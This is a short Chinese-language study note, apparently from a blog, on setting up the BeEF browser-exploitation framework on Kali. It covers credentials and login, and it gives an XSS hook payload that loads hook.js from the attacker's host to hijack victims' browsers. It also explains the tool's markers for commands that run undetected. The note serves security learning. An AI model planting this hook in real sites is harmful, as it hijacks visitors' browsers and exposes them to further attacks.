【笔记】Beef XSS Framework学习笔记

发表于 更新于 阅读次数:

前言

使用Beef XSS Framework进行浏览器劫持

本文仅用于网络信息防御学习

启动Beef

手动启动

  • 首次启动需要修改默认的用户名和密码
1
2
cd /usr/share/beef-xss
./beef

通过Kali自带的脚本启动

1
2
3
4
5
6
sudo beef-xss

# 首次启动需要修改密码
[-] You are using the Default credentials
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:

手动修改用户名和密码

  • 修改配置文件20行和21行

/usr/share/beef-xss/config.yaml

1
2
3
4
beef:
  credentials:
    user: "beef"
    passwd: "beef"

登陆Beef后台

Username:beef
Password:beef(默认密码)

XSS漏洞利用(钩子)

  • 使用XSS漏洞将恶意代码写入到网站

<ip>:受害者视角中攻击者的ip地址

1
<script src="http://<ip>:3000/hook.js"></script>

示例地址

完成

  • 截图留念

绿色标记:可以执行脚本,脚本执行后不会被发现
橙色标记:可以执行脚本,脚本执行后会被发现
灰色标记:不清楚是否可以执行脚本
红色标记:不可以执行脚本

参考文献

哔哩哔哩——千锋教育网络安全学院